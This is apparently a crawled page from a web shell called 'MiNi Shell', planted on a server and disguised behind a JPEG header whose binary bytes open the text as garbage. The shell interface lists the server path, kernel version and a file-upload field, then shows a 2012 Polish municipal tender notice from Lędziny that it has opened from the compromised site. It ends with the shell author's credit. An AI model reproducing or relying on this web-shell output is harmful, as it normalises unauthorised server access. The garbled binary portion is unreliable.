JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20120704/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20120704/145801-N-2012.html

<p class="kh_header"><b>Lędziny: Wykonywanie czynności zespołu zarządzającego - Instytucji Wspomagającej Zarządzanie (IWZ) w projekcie pn.:
Eliminacja wykluczenia cyfrowego w  Gminie Lędziny ze środków Europejskiego Funduszu Rozwoju Regionalnego w ramach: Programu Operacyjnego Innowacyjna Gospodarka; 8. Oś Priorytetowa: Społeczeństwo informacyjne - zwiększanie innowacyjności gospodarki, - Działanie 8.3. Przeciwdziałanie wykluczeniu cyfrowemu - eInclusion</b><br>
<b>Numer ogłoszenia: 145801 - 2012; data zamieszczenia: 04.07.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Urząd Miasta Lędziny , ul. Lędzińska 55, 43-143 Lędziny, woj. śląskie.</p>
<ul class="kh_indent_1">
</ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Wykonywanie czynności zespołu zarządzającego - Instytucji Wspomagającej Zarządzanie (IWZ) w projekcie pn.:
Eliminacja wykluczenia cyfrowego w  Gminie Lędziny ze środków Europejskiego Funduszu Rozwoju Regionalnego w ramach: Programu Operacyjnego Innowacyjna Gospodarka; 8. Oś Priorytetowa: Społeczeństwo informacyjne - zwiększanie innowacyjności gospodarki, - Działanie 8.3. Przeciwdziałanie wykluczeniu cyfrowemu - eInclusion.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest wykonywanie zadań zarządzania projektem  pn. Eliminacja wykluczenia cyfrowego w  Gminie Lędziny ze środków Europejskiego Funduszu Rozwoju Regionalnego w ramach: Programu Operacyjnego Innowacyjna Gospodarka. 8. Oś Priorytetowa: Społeczeństwo informacyjne - zwiększanie innowacyjności gospodarki, - Działanie 8.3.  Przeciwdziałanie wykluczeniu cyfrowemu - eInclusion, w zakresie Koordynacji i prowadzenia działań związanych z realizacją projektu oraz jego wdrożeniem w tym:
Realizacji projektu prowadzącej do osiągnięcia celu projektu oraz wskaźników określonych we wniosku oraz w umowie, a także zapewnienia trwałości projektu zgodnie z: Umową o dofinansowanie projektu wraz z załącznikami, z obowiązującymi przepisami prawa krajowego i wspólnotowego, w szczególności zasadami polityk wspólnotowych, w tym przepisami dotyczącymi konkurencji, udzielania zamówień publicznych, ochrony środowiska oraz równouprawnienia kobiet i mężczyzn; z wytycznymi Ministra Rozwoju Regionalnego obowiązującymi na dzień dokonania odpowiedniej czynności; z wytycznymi Ministra Rozwoju Regionalnego w zakresie kwalifikowania wydatków w ramach PO IG.
Realizacji zadania zgodnie z harmonogramem rzeczowo-finansowym wynikającym z wniosku o dofinansowanie projektu. Do zadań wykonawcy przedmiotu zamówienia będzie należało pełnienie roli wykonawcy zadań zespołu zarządzającego - Instytucji Wspomagającej Zarządzanie (IWZ) w ramach realizacji przedmiotowego Projektu, w tym w szczególności. 
Ustalenie planu promocji, nadzór nad prawidłową i terminową realizacją  działań promocyjnych, w tym artykułów, ogłoszeń w prasie, ulotek. Nadzór nad  prawidłowym oznakowaniem sprzętu, pomieszczeń, dokumentacji i materiałów, uruchomieniem, prowadzeniem i utrzymaniem strony internetowej dotyczącej projektu. Koordynowanie działań informacyjno - promocyjnych, w tym udzielanie informacji bezpośrednich zgodnie z wytycznymi i ustalonym planem promocji.
Nadzór nad prawidłową i terminową realizacją szkoleń beneficjentów
Wsparcie Zamawiającego w procesie rekrutacji grupy docelowej beneficjentów ostatecznych, opracowanie planu i regulaminu rekrutacji, opracowanie zasad rekrutacji w przypadku naboru dodatkowego. Uczestnictwo w pracach Komisji Rekrutacyjnej .
Wsparcie  Zamawiającego w przeprowadzeniu procedur wyboru wykonawców i wybór wykonawców realizujących zamówienia, których przedmiotem są usługi lub dostawy o wartości do 14 tys. euro.
Przygotowanie projektów dokumentacji postępowań ws. zamówień publicznych dla poszczególnych zadań wchodzących w skład projektu, w szczególności ustalanie wartości zamówienia, opis przedmiotu zamówienia i określenie warunków udziału w postępowaniu, określenie kryteriów oceny ofert, przygotowanie projektów ogłoszeń o zamówieniu, SIWZ, projektów umów.
Wsparcie Zamawiającego w przygotowaniu we współpracy ze Specjalistą. ds. zamówień publicznych Urzędu Miasta Lędziny, zgodnie  z ustawą Prawo Zamówień Publicznych oraz rekomendacjami instytucji zarządzającej środkami funduszy strukturalnych łącznego przetargu lub przetargów wymaganych podczas realizacji projektu na :
wyłonienie wykonawcy dostawy sprzętu komputerowego wraz z niezbędnym oprogramowaniem
wyłonienie wykonawcy teleinformatycznej sieci szerokopasmowej wraz z łączem do operatora krajowego sieci Internet (tryb zaprojektuj - wybuduj),
Wyłonienie Operatora Wykonawczego Projektu,
oraz  wsparcie w udzieleniu odpowiedzi na pytania, ocenie złożonych ofert, formułowaniu pism o wykluczeniu wykonawców i odrzuceniu ofert i wyborze najkorzystniejszej oferty. 
Opracowanie protokołów, dotyczących odbioru zakupionego sprzętu, uruchomienia łącza internetowego, przekazania sprzętu ostatecznym odbiorcom.
Nadzór nad prawidłową realizacją umów z Wykonawcami w zakresie dostawy sprzętu, nadzór nad właściwym i terminowym przekazywaniem sprzętu do odbiorców - osób fizycznych i odbiorców - podmiotów publicznych zgodnie z wnioskiem 
Pomiar i monitorowanie wskaźników, rezultatów wskazanych we wniosku o dofinansowanie
Przygotowywanie wymaganych umową o dofinansowanie dokumentów, raportów i sprawozdań wymaganych przez Instytucję Wdrażającą
Nadzór nad terminowym wykonywaniem prac przewidzianych w projekcie, terminowe zamknięcie i ostateczne rozliczenie projektu.
Wsparcie Zamawiającego w przekazywaniu dokumentacji do archiwizacji zgodnie z zapisami umowy o dofinansowanie. 
Bieżąca analiza i aktualizacja harmonogramu rzeczowo-finansowego i sygnalizowanie Zamawiającemu z właściwym wyprzedzeniem o potrzebie dokonania w nim zmian. Dokonywanie analizy wykorzystania środków finansowych i bieżące informowanie Zamawiającego o ewentualnych zagrożeniach w realizacji projektu w stosunku do harmonogramu.
Sporządzanie  wniosku o płatność oraz nadzorowanie terminowości jego złożenia.
Rekomendowanie do zatwierdzanie pod względem merytorycznym dokumentów finansowo-księgowych i umów zawieranych w ramach projektu.
Nadzór nad sprawozdawczością projektu.
Wspieranie Zamawiającego w monitoringu i ewaluacji projektu.  (prawidłowości i   terminowości działań prowadzonych w projekcie, w tym działań wykonawców wyłonionych do realizacji projektu).</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 45.00.00.00-7, 45.11.27.20-8, 45.21.22.00-8, 45.21.42.10-5, 45.31.61.00-6, 45.23.13.00-8.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.10.2014.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie precyzuje w tym zakresie żadnych wymagań, których spełnienie wykonawca będzie zobowiązany wykazać.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykaz wykonanych usług niezbędnych do wykazania spełniania warunku wiedzy i doświadczenia,  w okresie trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu,  jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz załączeniem dokumentu potwierdzającego, że usługi zostały wykonane należycie- Załącznik Nr 4 do SIWZ .
Warunek będzie uznany za spełniony poprzez wykazanie wykonanych usług tj.:
Wykonawca winien wykazać, że posiada doświadczenie potwierdzone realizacją co najmniej 2 usług dotyczących wsparcia w przeprowadzeniu postępowania na wyłonienie wykonawców w przetargu o wartości tego przetargu co najmniej 500 000,00 PLN.
Wykonawca winien wykazać, że posiada doświadczenie potwierdzone realizacją co najmniej 2 usług dotyczących realizacji działań promocyjnych lub nadzoru nad prawidłową i terminową realizacją  działań promocyjnych, w tym artykułów w prasie, ogłoszeń w radio lub telewizji, ulotek, plakatów i tablic pamiątkowych oraz nadzorem nad  prawidłowym oznakowaniem sprzętu.
Wykonawca winien wykazać, że posiada doświadczenie potwierdzone realizacją co najmniej 2 usług dotyczących realizacji zadań polegających na wykonaniu strony www (portalu internetowego) dla projektu lub nadzorem nad  uruchomieniem , prowadzeniem i utrzymaniem strony internetowej dotyczącej projektu. 
Wykonawca winien wykazać, że posiada doświadczenie potwierdzone realizacją co najmniej 2 usług dotyczących realizacji szkoleń lub nadzoru nad prawidłową i terminową realizacją szkoleń lub 2 cyklów szkoleń w liczbie co najmniej 80 godzin  łącznie dla co najmniej 100 uczestników łącznie, z zakresu: obsługa komputera, obsługa Internetu, dostęp do portali informacyjnych,  e-aplikacji; 
Wykonawca winien wykazać, że posiada doświadczenie potwierdzone realizacją co najmniej 2 usług dotyczących realizacji zadań nadzoru nad realizacją procesu budowy infrastruktury teleinformatycznej, o wartości tej infrastruktury co najmniej 400 000,00 PLN każdy, w technologii bezprzewodowej,
Wykonawca winien wykazać, że posiada doświadczenie potwierdzone realizacją co najmniej 2 usług dotyczących realizacji zadań polegających na wykonywaniu usług administracyjno - rozliczeniowych dotyczących rozliczenia projektu finansowanego ze środków zewnętrznych o wartości projektu  co najmniej 500 000,00 PLN, w tym co najmniej na: pomiarze i monitorowaniu wskaźników, przygotowywaniu raportów i sprawozdań wymaganych przez Instytucję Wdrażającą, analizie i aktualizacji harmonogramu rzeczowo-finansowego, sporządzaniu wniosku o płatność.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie precyzuje w tym zakresie żadnych wymagań, których spełnienie wykonawca będzie zobowiązany wykazać.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W celu potwierdzenia, że Wykonawca spełnia warunek dysponowania osobami zdolnymi do wykonania zamówienia Zamawiający wymaga złożenia następujących dokumentów:
wykazu osób (załącznik Nr 5 SIWZ), które będą uczestniczyć w wykonaniu zamówienia, wraz z danymi na  temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami 
Wymagane osoby zdolne do wykonania zamówienia:
Zamawiający wymaga w szczególności dysponowania zespołem składającym się minimum z dwóch osób (w tym lider), przy zachowaniu warunku, że jedna osoba może łączyć kilka funkcji z niżej wymienionych: 

Lider zespołu posiada następujące kwalifikacje: wykształcenie wyższe, oraz co najmniej 1 rok doświadczenia zawodowego dotyczącego zarządzania realizacją przedsięwzięć teleinformatycznych o wartości nie mniejszej niż 500 000,00 PLN oraz posiadanie ukończonego, co najmniej jednego szkolenia z zakresu zarządzania projektami,
Ekspert ds. społeczeństwa informacyjnego lub unii europejskiej, posiada następujące kwalifikacje: wykształcenie wyższe, oraz co najmniej roczne doświadczenie zawodowe, w planowaniu i realizacji co najmniej 1 projektu związanego z rozwojem społeczeństwa informacyjnego, posiada ukończone studia podyplomowe lub studium w zakresie Społeczeństwa Informacyjnego, problematyki Unii Europejskiej lub równoważne,
Ekspert ds. technicznych w zakresie przygotowania i realizacji przedsięwzięć teleinformatycznych, posiada następujące kwalifikacje: wykształcenie wyższe techniczne w kierunku telekomunikacji, teleinformatyki lub równoważne, który posiada nie mniej niż 1 rok doświadczenia zawodowego, dotyczącego zarządzania, projektowania i realizacji przedsięwzięć inwestycyjnych dotyczących projektów teleinformatycznych o wartości co najmniej 500 000,00 PLN, 
Ekspert ds. rozliczania finansowego wykształcenie wyższe preferowane o kierunku finanse , który posiada nie mniej niż 1 rok  doświadczenia zawodowego, dotyczącego  ewaluacji projektów oraz rozliczania środków UE przedsięwzięć inwestycyjnych o wartości co najmniej                       500 000,00 PLN, pomiarze i monitorowaniu wskaźników, przygotowywaniu raportów i sprawozdań wymaganych przez Instytucję Wdrażającą, analizie i aktualizacji harmonogramu rzeczowo-finansowego, sporządzaniu wniosku o płatność. znajomość :
zasad obsługi budżetu
programu Generator Wniosków o Płatność
przepisów ustawy o finansach publicznych i rachunkowości,
zasad księgowania,</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W celu potwierdzenia, że Wykonawca spełnia warunek wymaganej sytuacji ekonomicznej Zamawiający wymaga złożenia następujących dokumentów: 
opłaconej polisy, a w przypadku jej braku innego dokumentu potwierdzającego, że Wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia - wymagana jest polisa  od odpowiedzialności cywilnej w zakresie prowadzonej działalności na kwotę nie mniejszą niż 60.000,00 zł</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Wypełniony załącznik nr 1 - druk oferty</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający przewiduje następujące możliwości dokonywania istotnej zmiany zawartej umowy w stosunku do treści oferty na podstawie której dokonano wyboru Wykonawcy w przypadku wystąpienia co najmniej jednej z okoliczności wymienionych poniżej, z uwzględnieniem podanych warunków ich wprowadzenia:
Zmiany w zakresie nazwy zadania, danych Stron, w szczególności ich adresów, przedstawicieli Stron, innych osób wskazanych imiennie w Umowie, nie stanowią zmiany Umowy i będą dokonywane w formie jednostronnego oświadczenia Strony, której zmiana dotyczy, złożonego na piśmie pod rygorem nieważności. Oświadczenie powinno zostać doręczone drugiej Stronie z 7 dniowym wyprzedzeniem. W przypadku niedopełnienia obowiązku powiadomienia drugiej Strony o zmianie, za skuteczne uznaje się czynności dokonane a uwzględnieniem dotychczasowych danych.
zmiany osobowe:
zmiana osób, przy pomocy których Wykonawca realizuje przedmiot umowy, na inne legitymujące się co najmniej równoważnym doświadczeniem, które wymagane były przez Zamawiającego w ogłoszeniu i SIWZ.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://www.bip.ledziny.pl./content/show.php?pg=przetargi<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Miasta Lędziny, Wydział Inwestycji i Zamówień Publicznych, Lędziny, ul. Lędzińska 47 - I piętro pokój DG3.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 19.07.2012 godzina 09:50, miejsce: Urząd Miasta Lędziny, 43-143 Ledziny, ul. Lędzińska 55 - I piętro, sekretariat.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Projekt wpółfinansowany ze środków Europejskiego Funduszu Rozwoju Regionalnego w ramach Programu Operacyjnego Innowacyjna Gospodarka.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com